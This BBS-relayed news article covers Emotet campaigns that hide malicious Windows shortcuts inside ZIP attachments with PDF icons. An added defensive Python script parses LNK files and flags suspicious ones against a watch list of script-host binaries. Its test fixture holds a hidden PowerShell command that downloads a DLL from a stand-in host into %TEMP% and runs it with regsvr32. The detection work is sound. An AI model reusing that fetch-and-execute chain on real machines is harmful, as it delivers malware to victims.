• Uh oh, malicious Windows shortcuts are making a return

    From TechnologyDaily@1337:1/100 to All on Wed Jun 22 20:45:04 2022
    Uh oh, malicious Windows shortcuts are making a return

    Date:
    Wed, 22 Jun 2022 19:24:22 +0000

    Description:
    Dangerous Windows shortcuts are being dressed up as PDF files in a new Emotet campaign.

    FULL STORY ======================================================================

    At least two threat actors have recently been observed distributing malicious Windows shortcut files designed to infect victims with malware.

    Late last week, cybersecurity researchers from Varonis reported seeing the dreaded Emotet threat actor, as well as the lesser-known Golden Chickens
    group (AKA Venom Spider), distributing .ZIP archives via email, with .LNK files inside those archives.

    Using Windows shortcut files to deploy malware or ransomware on the target endpoint is not exactly novel, but these threat actors have given the idea a brand new spin.

    Shortcuts posing as PDF files

    Most long-time Windows users have probably changed the icon on a desktop shortcut at least once, for a game if nothing else.

    In this particular campaign, the threat actors replaced the shortcut's default icon with that of a .PDF file, so that an unsuspecting victim who receives the email attachment can't spot the difference with a basic visual inspection. Explorer never displays the .lnk extension, even when "Hide extensions for known file types" is turned off, so a file named, say, invoice.pdf.lnk shows up as invoice.pdf with a PDF icon.


    But the danger is real. Windows shortcut files can be used to drop pretty
    much any malware onto the target endpoint: a shortcut carries a target and command-line arguments that run when it is opened, and in this scenario that command downloads the Emotet payload into the victim's %TEMP% directory. If successful, the payload is loaded into memory using regsvr32.exe, after which the original dropper is deleted from %TEMP%.

    The best way to protect against these attacks, the researchers say, is to thoroughly inspect every incoming email attachment and to quarantine and block any suspicious content, including ZIP-compressed files that contain Windows shortcuts.
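    The following is an added example, not code from the article or from Varonis: a small Python triage script that unpacks a ZIP attachment in memory, parses any .LNK member straight from the MS-SHLLINK binary layout (the 76-byte header, then the StringData block with the relative path, arguments and icon location), and flags the pattern described above: a PDF icon sitting on a shortcut that launches a script host, a command line that stages a payload under %TEMP% and hands it to regsvr32.exe, and the console window suppressed via ShowCommand. The watch list of script hosts, the icon heuristic, the fixture shortcut, the example.invalid URL and the file names are all assumptions made for the example, not indicators from the real campaign.

```python
import io
import struct
import zipfile

# LinkFlags bits of the ShellLinkHeader (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
HEADER_SIZE, LINK_CLSID = 0x4C, bytes.fromhex("0114020000000000c000000000000046")
# Script hosts / proxy-execution binaries a "PDF" has no business launching (assumed watch list).
LOLBINS = ("cmd.exe", "powershell", "pwsh", "regsvr32", "rundll32", "mshta",
           "wscript", "cscript", "certutil", "bitsadmin", "curl.exe")


def parse_lnk(data: bytes) -> dict:
    """Minimal MS-SHLLINK reader: ShowCommand plus the StringData block."""
    if len(data) < HEADER_SIZE or data[:4] != b"L\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, name in STRING_FIELDS:       # CountCharacters (2 bytes), then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + width * count
    return fields


def triage_lnk(fields: dict) -> list:
    """Heuristics for a shortcut dressed up as a document; each hit is one reason string."""
    reasons = []
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    icon = fields.get("icon_location", "").lower()
    hosts = [b for b in LOLBINS if b in cmd]
    if hosts:
        reasons.append("launches " + ", ".join(hosts))
    if hosts and (icon.endswith(".pdf") or "acro" in icon or "adobe" in icon):
        reasons.append("PDF icon on a shortcut that runs a script host")
    if "%temp%" in cmd or "\\temp\\" in cmd:
        reasons.append("stages or executes a payload under %TEMP%")
    if fields.get("show_command") == 7:   # SW_SHOWMINNOACTIVE: the console window is never shown
        reasons.append("console window suppressed (ShowCommand=7)")
    return reasons


def scan_zip_attachment(zip_bytes: bytes) -> dict:
    """Map each .lnk member of the attachment to its triage reasons (empty list = no indicators)."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            reasons = []
            if info.filename.count(".") > 1:   # invoice.pdf.lnk: Explorer never shows .lnk
                reasons.append("double extension " + info.filename)
            try:
                reasons += triage_lnk(parse_lnk(zf.read(info)))
            except (ValueError, struct.error) as exc:
                reasons.append("unparseable .lnk: %s" % exc)
            verdicts[info.filename] = reasons
    return verdicts


def build_lnk(relative_path, arguments, icon_location, show_command=7) -> bytes:
    """Constructed fixture (not a captured sample): a Unicode LNK with no IDList or LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return header + body


# Constructed stand-in for the chain in the article (fetch to %TEMP%, load with regsvr32.exe,
# delete the dropper). The URL, file names and icon path are invented, not real IOCs.
SAMPLE_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\cmd.exe",
    '/c powershell -w hidden -c "iwr http://example.invalid/f -o %TEMP%\\f.dll; '
    'regsvr32 /s %TEMP%\\f.dll; del %TEMP%\\f.dll"',
    "%ProgramFiles%\\Adobe\\Acrobat\\Acrobat.exe")


def build_sample_zip() -> bytes:
    """Constructed attachment: the fixture named like a PDF, next to a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2022-06.pdf.lnk", SAMPLE_LNK)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip_attachment(build_sample_zip()).items():
        print(name, "->", "; ".join(reasons) or "no indicators")
```

    The parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes rather than interpreting them, which is enough to reach the StringData block where the command line lives; a real shortcut may carry its target only in the IDList, so a production scanner would also walk the shell item IDs. Run on the constructed sample, the script reports the double extension, the launched script hosts, the PDF icon mismatch, the %TEMP% staging and the suppressed window, while a plain document shortcut with ShowCommand=1 produces no indicators.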

    Admins should also restrict the execution of unexpected binaries and scripts from the %TEMP% directory, limit user access to Windows scripting engines such as PowerShell and VBScript, and require scripts to be signed, enforcing that requirement via Group Policy. Since the shortcut itself is a data file rather than a script, these controls bite at what it launches (the command interpreter or script host, and regsvr32.exe) rather than
    at the .LNK file itself.



    ======================================================================
    Link to news story: https://www.techradar.com/news/uh-oh-malicious-windows-shortcuts-are-making-a-return/


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)